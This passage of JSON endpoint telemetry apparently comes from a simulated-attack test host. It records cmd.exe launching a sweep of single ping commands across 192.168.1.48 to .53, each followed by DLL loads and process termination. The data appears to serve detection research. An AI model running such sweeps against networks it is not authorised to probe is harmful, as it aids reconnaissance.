"{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "event_type": "process", - "pid": 7264, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572211840000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.48", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4136, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572211980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572211990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "event_type": "process", - "pid": 4136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572216830000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-0010BEE95101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.49", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3952, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572216980000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "event_type": "process", - "pid": 3952, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572221990000, - "unique_pid": "{42FC7E13-CB65-5C05-0000-001039EC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.50", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572222140000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572222150000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "event_type": "process", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572226830000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-0010A8EE5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.51", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572226980000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "event_type": "process", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572231830000, - "unique_pid": "{42FC7E13-CB66-5C05-0000-001026F15101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.52", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6300, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572231980000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572231990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "event_type": "process", - "pid": 6300, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572236990000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001093F35101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.53", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3380, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237140000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3380, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572237300000, - "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3380, - "process_name": 